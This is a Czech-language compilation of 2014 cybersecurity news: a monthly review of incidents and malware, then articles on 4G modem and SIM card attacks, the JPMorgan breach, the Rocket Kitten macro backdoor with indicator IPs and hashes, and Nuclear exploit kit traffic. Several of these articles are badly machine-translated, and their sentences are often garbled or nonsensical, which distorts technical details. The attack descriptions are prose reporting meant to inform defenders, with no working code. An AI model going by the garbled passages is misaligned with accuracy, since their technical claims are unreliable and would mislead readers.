Český Národní bezpečnostní tým CSIRT varoval před počítačovým virem napadajícím routery. Podle zástupců týmu se tato hrozba šíří i českým internetem. Prostřednictvím routeru se útočníci snadno a bohužel často i nepozorovaně dostanou do všech připojených PC.
Internetoví podvodníci vylákávají od lidí z jejich bankovních účtů nezákonně peníze. Napomáhají jim prostředníci, kteří o nelegální činnosti nemají ani tušení. Přeposílají podvodem převedené peníze na účty skutečných pachatelů. Banky zaznamenaly řadu událostí, kdy takzvaní bílí koně byli zneužiti pro nelegální převod peněz.
Od objevení Chyby krvácejícího srdce (The Heartbleed Bug), která se týká šifrovací knihovny OpenSSL, uplynul v květnu již více než měsíc. Přesto stále na 300 tisíc internetových serverů tuto závažnou trhlinu neopravilo.
Největší aukční server světa eBay postihl kybernetický útok. Při něm se pirátům podařilo odcizit 145 miliónů hesel. Útok se měl uskutečnit už na přelomu února a března, zástupci firmy však o něm informovali až v květnu.
Největší aukční server světa eBay
Z eBay bylo ukradeno 145 miliónů hesel
ČERVEN
Chytré telefony ohrožuje nový mobilní virus, který se chová podobně jako obávaný Cryptolocker na klasických počítačích. Uživatelům zašifruje data uložená ve smartphonu a za jejich odemknutí požaduje výkupné.
Internetem koluje nový škodlivý program, který se vydává za oficiální aplikaci Seznam.cz E-mailu. Na napadeném počítači se snaží uživatele přesvědčit, aby si do svého chytrého telefonu nainstalovali prostředek pro jednodušší a bezpečnější práci se svou poštovní schránkou. Ve skutečnosti však do smartphonu propašují dalšího nezvaného návštěvníka.
Počítačová kriminalita stojí světovou ekonomiku zhruba 445 miliard dolarů ročně (asi devět biliónů korun) a škodí zejména firmám v důsledku narušování jejich duševního vlastnictví. Podle červnové studie washingtonského Střediska pro strategická a mezinárodní studia (CSIS) poškozuje kybernetická zločinnost obchod, inovace a konkurenceschopnost.
Doslova zlatý důl je pro počítačové piráty sociální síť Facebook. Jedna z posledních hrozeb objevených v červnu jim totiž umožňuje vydělat velké peníze, prostřednictvím trojských koní v cizích počítačích získávají virtuální měnu - bitcoiny.
ČERVENEC
Policie vyšetřuje první případ okradení přes podvodný e-mail. Žena otevřela přílohu mailu a nevědomky si nainstalovala vir, který poslal přihlašovací údaje k internetovému bankovnictví podvodníkovi, jenž pak ženu obral o více než 400 tisíc korun.
Podvodné e-maily, ve kterých počítačoví piráti hrozí tisícovými dluhy, kolují českým internetem dodnes. Před hrozbou varovala už v červenci Policie ČR s tím, že kyberzločinci jsou stále častěji ve svých hrozbách úspěšní.
Internetové stránky Evropské centrální banky
Hackeři zaútočili na web Evropské centrální banky
Internetové stránky Evropské centrální banky (ECB) se staly terčem hackerského útoku. Hackeři prý ukradli některé e-mailové adresy a jiné kontaktní údaje. Data, která by mohla ovlivnit vývoj na trzích, ale prý dotčena nebyla.
Výzkumníci ze společnosti AdaptiveMobile analyzovali červa nazývaného Selfmite, který se zaměřuje na chytré telefony s operačním systémem Android. Bezpečnostním expertům dělá vrásky na čele především proto, že se dokáže šířit prostřednictvím SMS zpráv. Obrana přitom není vůbec snadná.
SRPEN
USB zařízení se v posledních letech těší velké popularitě. Nejrůznější flešky nebo externí pevné disky má doma snad každý, nabízejí snadnou cestu, jak uchovávat nebo přenášet data. Zároveň ale představují také velké bezpečnostní riziko, jak upozornili bezpečnostní experti společnosti SR Labs Karsten Nohl a Jacob Nell.
Bezpečnostní expert Karsten Nohl
Více než 1,2 miliardy hesel mělo být ukradeno během obřího hackerského útoku na stovky tisíc webů. Bezpečnostní experti ze společnosti Hold Security, kteří krádež přihlašovacích údajů odhalili, hovoří o největším útoku v historii internetu. Stopy podle nich vedou do Ruska.
Virus Cryptolocker, který zašifruje lidem data uložená na pevném disku a za jejich odemčení požaduje výkupné, je uživatelům počítačů známý již několik měsíců. Tento vyděračský škodlivý kód si však našel nový cíl – NAS servery. Jde o datová úložiště, která se v poslední době těší velké popularitě v domácnostech i malých firmách.
ZÁŘÍ
Vodami internetu se začala šířit nová spamová kampaň, ve které si kybernetičtí zločinci hrají na nájemné vrahy. Adresát má být údajnou obětí a podvodníci mu nabízejí odeslat všechny důkazy, které mají k dispozici. Za to si ale nechají samozřejmě zaplatit.
Americký Federální úřad pro vyšetřování (FBI) zkoumá, jak se do rukou hackera dostaly intimní fotografie desítek celebrit včetně herečky Jennifer Lawrencové. Britská stanice BBC upozornila, že snímky byly uloženy na vzdálených serverech, takzvaných cloudech.
Mám za úkol vás zabít, zkouší podvodníci napálit důvěřivce
Národní bezpečnostní tým CSIRT.CZ varoval před podvodnými e-maily, které začaly kolovat Českem. Podvodníci se tentokráte zaměřili na majitele internetových domén, od kterých požadují smyšlený poplatek za prodloužení platnosti domény.
ŘÍJEN
Triky, prostřednictvím kterých se snaží vylákat peníze z důvěřivců, už nejspíše počítačovým pirátům nestačí. Zaměřili se místo toho na bankomaty, ze kterých dovedou získat hotovost i bez použití platební karty. Slouží jim k tomu speciální program pojmenovaný Tyupkin. Ten se doposud objevil v bankomatech v Latinské Americe, Evropě a Asii a útočníci si díky němu přišli již na milióny dolarů.
Ukázka aplikace Snapchat
Hackeři ukradli přes 100 000 fotografií a videí ze Snapchatu
Více než 100 000 videí a fotografií z aplikace Snapchat uniklo na internet. V říjnu pak část z nich byla zveřejněna na internetu. Mezi lechtivým obsahem jsou přitom i data, která jejich majitelé považovali za smazaná.
Česká spořitelna varovala před nebezpečným virem, který kybernetičtí zločinci vydávají za bezpečnostní aplikaci. Snaží se tak dostat k penězům na cizích bankovních účtech, nezvaný návštěvník jim totiž otevře zadní vrátka na mobilní telefon, kam chodí potvrzovací SMS zprávy.
LISTOPAD
Při společném zátahu amerických a evropských úřadů proti provozovatelům nelegálních serverů s nabídkou drog a zbraní bylo zatčeno 16 lidí a uzavřeno na 400 podezřelých webů. Informoval o tom evropský policejní úřad Europol, podle něhož zásah probíhal v 18 zemích včetně Česka. Česká policie zatím k akci nesdělila žádné podrobnosti.
Počítačoví piráti zveřejnili na svých internetových stránkách soukromé záběry více než 73 000 domácností, podniků a veřejných prostranství. Získali totiž přístup do kamer s internetovým připojením po celém světě, odposlouchávali dokonce i dětské videochůvičky, pomocí kterých rodiče hlídají na dálku své ratolesti. Řadu videí nyní zveřejnil pirátský ruský server. Mezi postiženými jsou i Češi.
V Česku se v listopadu zvýšil počet podvodů s platebními kartami, při kterých jsou jejich majitelé vyzváni k odeslání údajů o kartě přes internet. Uvedlo to Sdružení pro bankovní karty (SBK). Varovalo zároveň, aby lidé informace o své kartě na výzvy z internetu nikdy nesdělovali.
Nová metoda, která by měla do budoucna umožnit automaticky identifikovat útoky hackerů i další možné škodlivé události pro počítače, vznikla ve spolupráci Českého vysokého učení technického (ČVUT) v Praze a společnosti Cisco. Autoři tento výsledek projektu vedeného Filipem Železným již přihlásili do patentového řízení.
PROSINEC
Exekutorská komora varovala zkraje prosince před podvodnými e-maily, které vyzývají adresáty k úhradě dluhů. Lidé by v žádném případě neměli posílat peníze na účet uvedený v dopise, v případě škody se mají obrátit na policii, sdělila mluvčí komory Petra Báčová.
Podíl spamu na celkovém objemu elektronické pošty se ve 3. čtvrtletí proti předchozímu kvartálu snížil o téměř dva procentní body na 67 procent. Nejrozšířenější škodlivou přílohou byl trojský kůň Redirector, který uživatele přesměroval na škodlivé stránky. Detekován byl ve třech procentech případů. Uvedla to v prosinci antivirová firma Kaspersky Lab.
Hackeři spojovaní se severokorejským komunistickým režimem vyzradili telefonní čísla hollywoodských hvězd Brada Pitta, Julie Robertsové a Toma Hankse. Zveřejnili také podrobnosti o alternativních jménech, která řada slavných herců používá, když cestují inkognito. Zmíněná hackerská skupina označující se jako Guardians of Peace (Strážci míru) se při svých útocích soustřeďuje na filmové studio Sony Pictures Entertainment.
Po instalaci škodlivého softwaru útočníci získají přístup k SMS zprávám, a to včetně těch, které slouží k potvrzení transakcí.
Stačí jedna SMS a peníze mizí kvůli viru z účtu
Česká spořitelna varovala před novým virem, který dokáže obelstít i zabezpečení transakcí prostřednictvím SMS zpráv. Nezvaný návštěvník se totiž snaží z počítače dostat na chytrý telefon jeho majitele, kterému tvrdí, že jde o bezpečnostní aplikaci. Žádnou takovou ale spořitelna ve skutečnosti nenabízí.
Software, který je obsažený ve velké části domácích wi-fi routerů, obsahuje zranitelné části. To umožňuje útočníkům na dálku převzít kontrolu nad domácími či firemními počítačovými sítěmi a připojenými zařízeními, jako jsou počítače nebo tablety.
Většina 4G modemy USB, SIM karty zneužitelné
1.1.2015 Mobil
Výzkumníci říkají, že 4G USB modemy obsahovat zneužitelné zranitelnosti, jehož prostřednictvím útočníci mohli, a vědci se podařilo získat plnou kontrolu nad strojů, které jsou připojeny k zařízení.
Výzkumníci z pozitivních Technologies představila briefing podrobně, jak ohrozit USB modemy a útok SIM karty pomocí SMS přes sítě 4G na konferencích PacSec a Chaos Computer Club v Tokiu a Hamburku, respektive za poslední měsíc.
Kromě toho, že pro plný přístup k zařízení, útok modem 4G také přineslo přístup k účastnickým účtů v příslušných nosných portálech. Odesláním binární SMS, vědci se podařilo zamknout SIM karty a čichat a dešifrovat zařízení provozu. Výzkum byl proveden pomocí Pozitivní Technologies tým složený z Sergey Gordeychik, Alexander Zaitsev, Kirill Nesterov, Alexey Osipov, Timur Yunusov, Dmitrij Sklyarov, Gleb Gritsai, Dmitrij Kurbatov, Sergej Puzankov a Pavel Novikov.
Ze šesti USB modemy s 30 samostatných zařízení firmware testovaných, vědci zjistili, že jen tři firmware odrůdy byly rezistentní na křídlech.
Podařilo se jim najít veřejně dostupné přístupové jméno a heslo telnet přes Google, ale oni potřebovali přístup http aby bylo možné sledovat komunikaci. Po připojení své USB modemy ke svým strojům a seznam zařízení, která musí být odlišena uzlů s webovými aplikacemi, vědci byli schopni spustit prohlížeč založený na cross-site požadavek padělání, cross-site scripting a vzdálené útoky spuštění kódu. Prostřednictvím těchto útoků, vědci získat informace o mezinárodní mobilní účastnické identit, univerzální karty s integrovanými obvody, mezinárodní mobilní stanice zařízení identit a verze softwaru, názvy zařízení, verze firmwaru, Wi-Fi stavy a další (viz obrázek vpravo).
Ukradené Informace o zařízení
Kromě informací, vědci nuceni modemy změnit nastavení DNS, aby čichat provozu, změňte nastavení SMS centra s cílem zachytit a zasahovat do SMS zpráv, měnit hesla na samoobslužné portály, zámek modemy záměrně Zadáváte nesprávný PIN nebo PUK, a na dálku aktualizovat firmware modemu pro zranitelné verze.
V výzkumníci zaznamenali v BLOGPOST že dopad jejich metod útoku se neomezuje jen na spotřebiteli za postižené smartphony. Jakýkoli počet zařízení kritické infrastruktury, včetně průmyslových řídicích systémů (ICS) a dispečerské řízení a získávání dat (SCADA) stroje používají mobilní komunikační technologie z velké části založena, nebo alespoň částečně na standardu GSM. Některé bankomaty i nasazení těchto USB modemu technologie na dálku přenášet údaje o platbách.
Jejich útok SIM bylo o něco méně účinné, když se podařilo jen využít asi 20 procent ze 100 SIM karet, které byly testovány. Ve skutečnosti jsou tyto útoky byly více či méně o to, zda jsou nebo nejsou vědci mohli hrubou silou standard šifrování dat (DES) klíče chránící Sims. 3DES klíče trvat podstatně déle, než se zlomit.
"Brute-force DES klíče, používáme sadu pole programovatelná hradlová pole (FPGA), která se stala trendy pro Bitcoin těžbu před pár lety a dostal levnější po humbuk skončila," napsali vědci. "Rychlost našich 8 modulů * ZTEX 1.15y rady s cenovkou 2000 Euro je 245,760 mcrypt / sec. To je dost získat klíč do 3 dnů. "
To byl jejich nejrychlejší brute-force. Pokud by měli částečně známý klíč 3DES, mohli rozbít to do 10 dnů. Nasazení standardní výpočetní výkon, stejně jako Intel CPU (jádro i7-2600k), bude trvat zhruba pět let, než se zlomit DES a více než 20 let zlomit 3DES.
Jakmile je DES nebo 3DES zlomené, vědci by mohli vydávat příkazy k Toolkit aplikace (TAR). Jedna taková TAR byl souborový systém ukládání dočasných Mobile Subscriber Identity a šifrování klíče. Tento přístup dal výzkumný pracovník schopnost dešifrovat účastníka provozu bez použití hrubé síly útoky na DES, podvržení identity účastníka s cílem získat její volání a texty, sledovat polohu předplatitel a způsobit odmítnutí služby vstupujícího tři chybné kódy PIN a 10 špatně PUK kódy v řadě, pokud je povolen kód PIN pro ochranu souborového systému.
Nový zákon o kybernetické bezpečnosti vstupuje v platnost
30.12.2014 Bezpečnost
Již 1. ledna 2015 v České republice nabyde účinnosti nový zákon o kybernetické bezpečnosti. Jedním z úkolů nové legislativy je sjednocení elektronické komunikace, a to nejenom ve státní správě, ale částečně i v soukromé sféře.
Mnoho lidí určitě má v živé paměti masivní útoky hackerů z března roku 2013, které byly namířeny proti webovým stránkám zpravodajských serverů, telekomunikačních operátorů nebo serverů bankovních společností v ČR. Tyto hackerské útoky poukázaly na velkou zranitelnost internetového prostředí
Nový zákon se přece jen ale týká především státní správy. Díky němu by měla být státní sféra i další klíčové počítačové systémy v zemi odolnější vůči potenciálním útokům.
Česká republika přitom není v zavádění této nové legislativy osamocena. Kybernetický zákon vychází ze směrnice Evropské unie, podle které mají všechny členské země zvyšovat svoji schopnost bránit se kybernetickým útokům.
„S rychlým rozvojem IT sektoru narůstá hrozba kybernetického útoku, která se může týkat každého člověka. A je třeba mít na paměti, že útoky hackerů jsou častější a čím dál masivnější,“ říká Nick Feifer, manažer společnosti Fortinet pro střední a východní Evropu (CEE).
Zajištění kybernetické bezpečnosti státu je tak podle něj zásadní otázkou současnosti a nový zákon je jedním z prostředků, jak jí docílit.
Nastala doba řešit resty, do kterých se nechce nebo na ně nebyl čas
30.12.2014 Rizika
Náš manažer bezpečnosti si našel čas, aby dokončil několik již delších dobu čekajících úkolů.
V oblasti rizik a zranitelností u nás stále zůstávají některé nevyřešené problémy. Jsou to záležitosti, jež se odsouvají z důvodu každodenních mimořádných událostí, rozpočtových omezení nebo interních příkazů. Když ale nastane ten správný čas, snažím se to změnit. Tady jsou tři věci, které v současné době intenzivně řeším.
Konfigurace VPN byla vždy spornou záležitostí mezi týmy zabezpečení, desktopů a sítí. Současný klient VPN se užívá v režimu rozděleného tunelování. Když někdo VPN používá, přenáší se šifrovaným tunelem jen komunikace se zdroji v naší síti. Všechno ostatní – jako jsou webový e-mail, sociální média či osobní ukládání souborů jako Dropbox – se směruje přes místní internetové připojení uživatele k internetu.
To ale velkou část přenosů vzdáleného uživatele ponechává bez ochrany a patřičné kontroly. Data, která neprocházejí tunelem, tak neprojdou přes naše firewally pro filtrování obsahu URL a nevidí je ani naše nástroje pro prevenci proti narušení (IPS), systém pokročilé analýzy malwaru, naše technologie pro kontrolu aplikační vrstvy a dokonce ani software pro prevenci ztráty citlivých dat (DLP), který rozpoznává případy úniků důležitých informací – ať už záměrných či náhodných.
Mé výhrady vůči rozdělenému tunelování se vždy setkávaly s protiargumenty zástupců ostatních oddělení, kteří se obávají, že v případě vynucení průchodu veškerých přenosů přes infrastrukturu naší firmy prostřednictvím VPN bude docházet k jejich zpomalování.
Tato patová situace se však může brzy vyřešit, protože letos se plánuje upgrade síťové infrastruktury a přidání dalších pokročilých funkcí, takže vyloučení možnosti rozděleného tunelování výkon sítě nijak nezasáhne.
Nechtěná publicita
Dalším rizikem, kterému se teď věnuji, je webové rozhraní k podnikovému e-mailu. Před několika lety jsme nasadili produkt Microsoft Outlook Anywhere, takže uživatelé mohou spouštět klienta Outlook bez nutnosti připojení přes síť VPN.
Nelíbí se mi však, že tato konfigurace umožňuje stahování e-mailů z našich serverů do libovolného vzdáleného počítače. Mohou jimi být například sdílené veřejné desktopy, jaké lze najít třeba ve vestibulech hotelů. Poté, co uživatel na takovém počítači přestane se svým e-mailem pracovat a odejde pryč, zůstanou v tomto PC i nadále zprávy elektronické pošty, kalendář i kontaktní informace.
Každý další uživatel tohoto veřejného počítače si může otevřít klienta Outlook a zobrazit všechny zmíněné informace, z nichž by některé mohly mít velmi citlivý charakter. Nedokáže se sice připojit k serveru Exchange a odesílat nebo přijímat poštu, ale e-maily, přílohy, kontakty a položky kalendáře pro něj budou zcela viditelné.
Chci použít řešení Microsoft Outlook Web Access (OWA) založené na prohlížeči. Pokud se použije OWA a dojde k řádnému uzavření prohlížeče a smazání webové historie, souborů cookie a paměti cache, nezůstane na klientském počítači fakticky žádná pošta. To je cesta, kterou se ubíráme při migraci všech našich zaměstnanců na cloudový e-mail Microsoft 365. Omezíme tak možnost použití řešení Outlook Anywhere pouze na firemní počítače.
Odhalené seznamy
A konečně třetí položkou na mém aktuálním seznamu úkolů je problém, který se týká oprávnění. K jeho odhalení došlo během vyšetřování nedávného incidentu uvnitř firmy. Náš analytik DLP zjistil, že oprávnění pro sdílený síťový disk, který obsahoval citlivé firemní dokumenty, se nastavila tak, že všichni uživatelé domény mohou z libovolné složky zobrazit seznam souborů.
Přestože si lidé nemohli soubory stáhnout ani zobrazit, může být zobrazení složky nebo názvů dokumentů riskantní.
Řekněme, že například oddělení lidských zdrojů má složku s názvem „Propouštění“ a v ní tabulku nazvanou „Propouštění v roce 2014.“ Každý, kdo by takové názvy viděl, by mohl vytvářet spekulace a za chvíli by mohly kolovat zvěsti o propouštění.
Poté, co jsme zjistili tuto konfiguraci u několika složek, musíme udělat hloubkovou kontrolu a opravu oprávnění všech sdílených složek ve firmě. Plánujeme také některé nové technické revize a nastavit procesy, aby nemohlo k nesprávnému nastavení oprávnění vůbec dojít.
Tento příspěvek do Zápisníku manažera pro bezpečnost napsal skutečný manažer bezpečnosti, který zde vystupuje jako Mathias Thurman. Jeho pravé jméno ani jméno zaměstnavatele z pochopitelných důvodů neuvádíme.
Two-Factor Snafu otevření dveří do JPMorgan Porušení
29.12.2014 Incidenty
Největší americká bankovní porušení všech dob sestoupil do nejmenších detailů.
New York Times s odvoláním na zdroje blízké na probíhající vyšetřování porušení dat JPMorgan, řekl hackeři našel server, nechráněný by dvoufaktorové autentizace to rozchodit pomocí ukradené uživatelské jméno a heslo. JPMorgan zveřejněny v srpnu, že vyšetřoval "počítačový hacking útok" spolu s FBI a tajné služby.
Dohledu vystavil údaje, které patří do odhadovaných 76000000 spotřebitelských domácností a sedmi miliony podniků a horší pro spodním řádku finanční instituce, úhledně přeskočil závratných 250000000 dolar zabezpečení IT rozpočet JPMorgan.
Rozloha porušení byl popsán v říjnu v Komisi pro cenné papíry (SEC) podání; JPMorgan uvedeno, že hackeři udělali hned uživatel kontaktní informace, včetně jmen, telefonních čísel a e-mailových adres. Čísla účtů, hesla, uživatelská jména, data narození a čísla sociálního zabezpečení byly také ohroženy, ale nebyly ukradeny podle SEC.
Hackeři měli přístup k téměř 100 serverů mezi červnem a srpnem před bezpečnostních týmů odříznutých přístupu útočníků. Tyto hacky byly spojeny s ruským či východoevropských zločineckých gangů.
Dvoufaktorová autentizace doporučuje Federální finanční instituce zkouška Rady (FFIEC), aby se zabránilo podvodům a krádežím dat v případech, kdy jsou hesla ztrátě nebo odcizení. Při ověření pomocí dvou faktorů, se uživatel přihlásí se svým zvoleným uživatelským jménem a heslem, a pak je třeba použít druhý způsob ověřování, jako je software nebo tvrdý projev, nebo PIN poslal do mobilního telefonu nebo pevné linky na dokončení ověřování banky účet.
Zatímco dvě-faktor není stoprocentní, mohlo by to být dost frustrovat hackery ve snaze vyhnout se přistižení ve středu útoku, přejít na měkčí cíli. JPMorgan hackeři zřejmě našel jeden přehlédl serveru udeřit zlato.
Hackeři našli serveru bez ochrany by dvoufaktorové autentizace to rozchodit pomocí ukradené uživatelské jméno a heslo
Tweet
"Inventury všech síťových vstupních bodů a kontrola dvakrát za upgrade je další způsob, jak zajistit, že žádný server nebo aplikace nebo přihlášení nezaostával, pokud jde o provádění kybernetické nástroje," říká zpráva na Duo Security, ověřovací firmy. "Vzhledem k tomu, jaký to má smysl používat bezpečnostní řešení, pokud je to realizovat pouze na část prostředí?"
JPMorgan vloupání také ukazuje, opět, že hackeři se nemusí klesnout zero-day exploity proniknout i dobře finančně podniků.
"Víme, že útočníci pokračovat přístup i když všechny druhy prostředků, včetně phishingu. Víme, že útočníci jsou krádeže a pomocí pověření, zejména správní pověření nebo účty, "řekl Trey Ford, Global Security stratég, Rapid7. "Až do společnosti rozvést přesvědčení, že uživatelé a účty jsou totéž, a začít sledování využití účtu, ostražitě hledal oslabenou použití účtu, tento trend z porušení bude pokračovat."
- See more at: http://threatpost.com/two-factor-snafu-opened-door-to-jpmorgan-breach/110119#sthash.4u0Jn8w5.dpuf
Rocket Kitten": Je to ještě APT, pokud si můžete koupit z regálu?
28.12.2014 APT
Gadi Evron a Tillmann Werner představil zajímavý případ v 31C3 konferenci v Hamburku včera, že ukazuje, jak komerční software může být použit k zahájení APT útoky stylu. V tomto případě je několik podobných útoků, kde zjistili, proti cílům v Izraeli a západní Evropě. Ve všech případech, útok začal s jednoduchým tabulkového procesoru Excel, který byl zaslán jako příloha [1]. E-mail sám byl krátký a všední, ale použitý falešný a pravděpodobný "Z" záhlaví.
Gadi byl tak laskav, že se s námi podělit některé screenshoty těchto příloh. Všichni jsou velmi věrohodné pro cílové příjemce. Klikněte na obrázek pro zobrazení obrázku v plné velikosti (jsou to obrazy, ne původní soubory Excel)
Ukázky Excel přílohy e-mailů
Každý soubor Excel součástí makra. Zatímco používání Excel maker a jednoduchý e-mailové zprávy zpočátku vypadal jako starý a jednoduchý využívat, backdoor upoutala pozornost Gadi a Tillmann který pomáhal s opačným analýzy. Ukázalo se, sofistikovanější a kradmý poté, co bylo zjištěno ve standardním kyberzločinu.
Makro Excel se skládala ze dvou souborů. Jeden z nich byl kódovaný PE binární, druhý jednoduchý skript VBA dekódovat PE binární, zapsat na disk a spusťte jej. To je místo, kde se věci binární dostal větší zájem. Je prováděna velmi schopný zadní vrátka, v podstatě přes server proxy prostřednictvím systémových volání, umožňují velmi flexibilní přístup k systému, který není omezující útočník souboru předdefinovaných příkazů.
Nakonec se ukázalo, že celý útok byl proveden za použití jádra Impact, draze, ale vysoce sofistikovaný produkt, umožňující "bod a klepněte na tlačítko" útoky na úrovni, která se obvykle používají pro APT útoky [2]. Zejména pokud přisuzovat útoky, jako je to na národních států, nebo naznačuje, že útočník musí být vysoce sofistikované a schopen psát vlastní využije, je nutné vzít v úvahu možnost, že útočník právě opakované využití komerční pentesting software, jako je klíčové Impact, nebo dokonce open source nástroje, které nabízejí podobné funkce. Rozpočet na takový útok je obvykle výrazně nižší než $ 100k koupit požadovaný software, číslo, které je dobře v dosahu i menších národů či skupin organizovaného zločinu. V některých případech může být možné najít pirátské kopie fo požadovaný software. Další výhodou použití komerčního softwaru je možnost požádat o podporu a profesionální služby, které vám pomohou s vaší APT útokem.
Kupodivu, backdoor nebyla uznána anti-virus nástroje, i když jádro Impact je běžně používaný produkt. Dopad Jádro také nedokáže "tag" jakýkoli software s pořadovým číslem zákazníka konkrétní, brání přiřazení v případech, jako je ten výše. Toto sériové číslo by nemělo bránit autorizovaného testu pero, ale pomoc při přiřazování neoprávněné útoky.
Pro více informací, vřele doporučuji, že se budete dívat Gadi a Tillmann [1].
[1] http://streaming.media.ccc.de/relive/6575/ (talk začíná kolem 15 minut do záznamu)
[2] http://www.coresecurity.com/core-security-client-side -exploits
Ukazatele kompromisu:
IP adresy
83.170.33.37
83.170.33.60
83.170.33.80
83.170.43.67
84.11.75.220
MD5 hash
01c9cebbc39e273ac1f5af8b629a7327
08273c8a873c5925ae1563543af3715c
08e424ac42e6efa361eccefdf3c13b21
0b0e2c4789b895e8ac44b6ada284aec1
177ef7faab3688572403730171ffb9c4
266cfe755a0a66776df9fd8cd2fee1f1
271a5f526a638a9ae712e6a5a64f3106
393bd2fd420eecf2d4ca9d61df75ff0c
395461588e273fab5734db56fa18051b
48573a150562c57742230583456b4c02
4bf2218eb068385ca1bfff8d609c0104
50d3f1708293f40a2c0c1f151c2c426f
5a009a0d0c5ecaac1407fb32ee1c8172
5af0cbc18c6f8ed4fd1a3f68961f5452
916be1b609ed3dc80e5039a1d8102e82
c222199c9a7eb0d162d5e96955739447
d0c3f4c9896d41a7c42737134ffb4c2e
da976a502a3afc4ba63611d47c625738
ee41e7c97f417b07177ea420afe510a1
f68a0a3784a7edfc60ad9333ec209cbf
f8547010eb4238f8fb76f4e8a756e36d
f89a4d4ae5cca6d69a5256c96111e707
Exploit Kit Evolution Během 2014 - Jaderná balíček
28.12.2014 Viry
Toto je hostem deník předložil Brad Duncan.
Jaderná využívat sadu (také známý jako nukleární Pack) je už léta. Verze 2.0 jaderné balíček byl zaznamenán v roce 2012 [1] [2]. Blogy jako malware.dontneedcoffee.com uvedli verzi 3.0 jaderné Pack na příspěvky v 2013 [3] [4].
Tento měsíc, jaderný balíček změnil své vzory provozu. Změny jsou významné natolik, že jsem zvědavý, jestli Jaderná Pack je ve verzi 4 Nebo je to jen vývoj verze 3, jak jsme viděli v průběhu 2014? Pojďme se podívat na provoz.
V lednu 2014 provoz z jaderného balíčku bylo podobné tomu, co jsem viděl v roce 2013. Zde je příklad z 24.ledna pomocí Java infikovat VM [5]:
2014 viděl Fiesta využívat kit-stylu URL z jaderných Pack. Také, stejně jako ostatní využít sestavy, Nuclear poslal Flash a Silverlight využije. Zde je příklad Od 29. září [6]:
Výše uvedený příklad je Silverlight, Flash, PDF a IE exploity. V každém případě, náklad byl poslán na zranitelné VM. Provoz se skládá ze dvou TCP proudů. Následující obrázky ukazují jednotlivé proudy a jejich požadavky HTTP GET:
Tyto vzory jsou nedaleko od počátku roku. Viděl jsem jen další využije z jaderné Pack, která jsem předtím nevšiml.
V prosinci 2014 se jaderný balíček přesunut do jiné struktury adres URL. Poprvé jsem si toho všiml na pcap z Threatglass.com [7]. Zpočátku bych spletl provoz pro Rybář exploit kit. Po přezkoumání pcap v oblasti bezpečnosti cibulkou, uvědomil jsem si, je to Nuclear balení.
Zde je další příklad Nuclear balení od 12.12.2014 [8]:
Od změny vzorů adres URL, Nuclear Pack je XOR-ing malware užitečné zatížení. Obrázek níže ukazuje příklad, kdy jeden z užitečných zatížení je XOR-ed s ASCII řetězec: DvnQkxI
Změna dopravních modelů je poměrně významný pro jadernou Pack. Nenašel jsem žádný důvod, proč došlo ke změně. Je to jen evoluce, nebo si tyto změny ukazují na novou verzi jaderného balíčku?
----------
Brad Duncan je analytik v Rackspace Security, a on provozuje blog na malware Traffic Analysis na http://www.malware-traffic-analysis.net
Reference:
[1] http://blog.spiderlabs.com/2012/04/a-new-neighbor-in-town-the-nuclear-pack-v20-exploit-kit.html
[2] http://www.webroot.com/blog/2012/10/31/nuclear-exploit-pack-goes-2-0/
[3] http://malware.dontneedcoffee.com/2013/08/cve-2013-2465-integrating-exploit-kits.html
[4] http://3.bp.blogspot.com/-iqXmOKC5Zgk/UieYOEA8jPI/AAAAAAAAA_c/nlX2cgxhyZo/s1600/screenshot_2013-09-04_020.png
[5] http://malware-traffic-analysis.net/2014/01/24/index.html
[6] http://malware-traffic-analysis.net/2014/09/29/index.html
[7] http://threatglass.com/malicious_urls/firstliving-org
[8] http://malware-traffic-analysis.net/2014/12/12/index.html
Co je špatného na přemostění datacenter spolu DR?
28.12.2014 Bezpečnost
Se dvěma příběhy na téma překlenovacích datových center, budete si myslet, že jsem opravdový věřící. A ano, myslím, že jsem se pár důležitých výhradami.
První z nich je zapouzdření nad hlavou. Jakmile překonat pomocí zapouzdření, bude maximální povolená přepravována velikost paketu zmenšit, pak zmenšit znovu, když zašifrovat. Pokud váš server OS nejsou chytrý o tom, budou předpokládat, že vzhledem k tomu, že je to všechno ve stejné vysílací domény, plný paket je samozřejmě v pořádku (1500 bajtů ve většině případů, nebo až do 9K, pokud jste jumbo frames povoleno) , Budete muset vyzkoušet na to - a to jak pro replikaci a konfiguraci neúspěšně po - jako součást svého návrhu a testovací fáze.
Druhý problém si, že pokud můstek datová centra mailem DR nebo druhý (aktivní) datacenter místě, jste v dobré pozici k převzetí celé serverové farmy, tak dlouho, jak můžete selhání připojení WAN a Internet uplink s nimi. Pokud ne, můžete skončit s tím, co Greg Ferro volá "síťového provozu trombón". ( http://etherealmind.com/vmware-vfabric-data-centre-network-design/ )
Pokud se vám nepodaří jeden server přes, nebo pokud se vám nepodaří přes farmu a nechte WAN za sebou, zjistíte, že data do a ze serveru budou procházet odkazující inter-site vícekrát pro jednu zákazníka transakce.
Například, řekněme, že jste se přestěhovali aktivní instanci vašeho poštovního serveru do DR stránek. Chcete-li zkontrolovat e-mail, bude paket dorazí na primárním serveru, traverz k poštovnímu serveru na místě B, pak se vraťte do místa A najít odkaz WAN vrátit klientovi. Stejně tak budou příchozí e-mail přijde na internetový odkaz, ale pak budou muset přejít na tento odkaz mezi sítěmi najít aktivní poštovní server.
Vynásobte, že typického objemu e-mailové ve středně velké společnosti, a můžete vidět, proč tento pozoun problém může přidat až rychle. I s odkazem 100 MB, budou lidé, které byly použity na výkon GB nyní vidět jejich šířka pásma zkrátit na 50 MB, nebo pravděpodobně nižší, než to, že se comensurate dopad na dobu odezvy. Pokud nakreslíte na to, vy dostanete pěknou reprezentaci pozoun - odtud název.
Co to znamená, že nemůžete navrhnout DR stránky pro replikaci a zastavit. Vy opravdu potřebujete, aby ji design pro použití během nouzových případech se chystáte na. Vezměme si dopady na šířku pásma, když se vám nepodaří přes malou část serverové farmě, a také to, co se stane, když se vaše hlavní stránky byly vyřazeny (krátký nebo delší dobu), požár nebo úraz elektrickým akce - vaše uživatelská komunita být spokojeni s výsledky ?
Dejte nám vědět v naší sekci komentáře, jak jste navrhl kolem tohoto "trombon" problém, nebo pokud (jak jsem viděl na některých místech), vedení se rozhodlo NOT utrácet peníze na účet za to.
Překlenovací Datová centra pro obnovu po havárii - Prakticky
28.12.2014 Bezpečnost
Už je to nějaký čas, co jsme mluvili o problémech Disaster Recovery - poslední deník posta jsem o tom byl na používání L2TPv3 překlenout vašem datovém centru / server VLAN na "stejné" VLAN na DR místě, přes libovolné vrstvy 3 síti ( https: //isc.sans.edu/diary/8704 )
